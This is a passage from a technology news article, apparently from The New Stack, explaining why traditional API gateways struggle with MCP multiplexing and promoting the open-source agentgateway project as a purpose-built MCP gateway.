Traditional API gateways struggle with this because they lack native JSON-RPC understanding and session-aware policy engines.

MCP Multiplexing

This is where traditional API gateways hit a wall. MCP multiplexing involves aggregating multiple backend MCP servers into a single logical endpoint, which we call “virtual MCP.”

For example, a client connects to one MCP endpoint but actually gets access to tools from multiple backend servers:

  • Weather tools from weather-service.internal
  • Database tools from analytics-service.internal
  • Email tools from notification-service.internal

Instead of AI agents needing to know about and connect to dozens of different MCP servers, they connect to one virtualized endpoint that provides a unified interface to all enterprise tools.

The complexity explosion: Implementing this requires capabilities that traditional API gateways simply don’t have:

  1. Session fan-out: When a client sends “tools/list,” the gateway must query all backend servers and merge results.
  2. Request routing: Tool calls must be routed to the correct backend based on the tool name.
  3. Response multiplexing: Streaming responses from multiple backends must be merged into a single SSE stream.
  4. State coordination: Session IDs and protocol negotiations must be managed across multiple backend connections.
  5. Error handling: Failures in one backend shouldn’t break the entire virtual session.

This level of protocol-aware aggregation and virtualization is beyond what traditional API gateways were designed to handle. You’d essentially need to rewrite the gateway’s core request/response handling logic to support MCP session semantics.

Agentgateway: Built for MCP From the Ground Up

Agentgateway, an open source Linux Foundation project, was purpose-built in Rust for AI agent protocols like MCP, drawing on lessons learned from building API gateways. Unlike traditional API gateways optimized for stateless REST interactions, agentgateway natively understands JSON-RPC message structures, maintains stateful session mappings and handles the bidirectional communication patterns inherent to MCP.

This deep protocol awareness allows it to properly multiplex and demultiplex MCP sessions, fan out client requests across multiple backend MCP servers, aggregate tool lists and maintain the critical two-way session mapping needed when servers initiate messages back to clients. Rather than fighting against an architecture designed for request-response APIs, agentgateway’s foundation aligns perfectly with MCP’s session-oriented, streaming communication model.

Building on this foundation, agentgateway serves as a native MCP gateway, large language model (LLM) gateway and agent-to-agent (A2A) proxy, providing the security, observability and governance capabilities that traditional API gateways cannot deliver.

It supports MCP multiplexing to federate tools from multiple backend servers, applies fine-grained authorization policies to control which tools clients can access and handles both stdio and HTTP Streamable transports seamlessly.

And when integrated with the Cloud Native Computing Foundation (CNCF) project kgateway as a control plane, agentgateway becomes Kubernetes native, enabling teams to manage MCP services using standard gateway API resources while the proxy takes care of the protocol-specific complexities.

This purpose-built approach delivers the performance, safety and operational simplicity enterprises need for production MCP deployments — without the brittleness, maintenance burden and architectural compromises of retrofitting an API gateway.

KubeCon + CloudNativeCon North America 2025 is taking place Nov. 10-13 in Atlanta, Georgia. Register now.

The post MCP vs. API Gateways: They’re Not Interchangeable appeared first on The New Stack.

Read the whole story
alvinashcraft
3 hours ago
reply
Pennsylvania, USA
Share this story
Delete
Next Page of Stories